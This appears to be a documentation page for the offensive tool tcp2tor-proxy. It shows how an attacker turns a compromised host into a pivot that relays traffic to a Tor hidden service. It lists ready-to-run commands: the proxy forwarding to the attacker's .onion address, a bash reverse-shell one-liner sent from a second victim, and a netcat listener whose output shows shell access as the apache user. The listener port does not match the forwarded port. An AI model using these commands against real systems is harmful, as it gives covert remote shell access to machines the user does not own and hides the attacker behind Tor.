Remote port forwarding with tcp2tor-proxy
We suppose that Victim2 does not have Internet access, so we cannot access Tor directly from it. However, we can use tcp2tor-proxy in order to use Victim1 as a Tor proxy for Victim2.
As shown in the following illustration, the attacker will publish a Hidden Service with a handler. With tcp2tor-proxy, Victim1 will serve a TCP port that routes the traffic directly to the Hidden Service. Then, Victim2 will send a simple reverse shell to Victim1 in order to reach the attacker handler.

1. Set up the remote port forwarding
As Victim1 is the host we will used as a pivot, we will run tcp2tor-proxy on it:
[victim1]$ ./tcp2tor-proxy -listen 0.0.0.0:60101 \
-onion-forward m5et..jyd.onion:4444
...
Proxying 0.0.0.0:60101 -> m5et..jyd.onion:4444
Now, the pivot is listening TCP traffic on port 60101
so that it will be routed to the Hidden Service the attacker owns.
2. Reverse shell to tcp2tor-proxy
As the traffic that reach tcp2tor-proxy will be routed to the Hidden Service, Victim2 only needs to send a simple reverse shell to the pivot:
[victim2]$ bash -i >& /dev/tcp/victim1/60101 0>&1
After executing the above command, the attacker will receive the shell:
[attacker]$ nc -lnvp 1234
...
id
uid=48(apache) gid=48(apache) groups=48(apache)
Last updated
Was this helpful?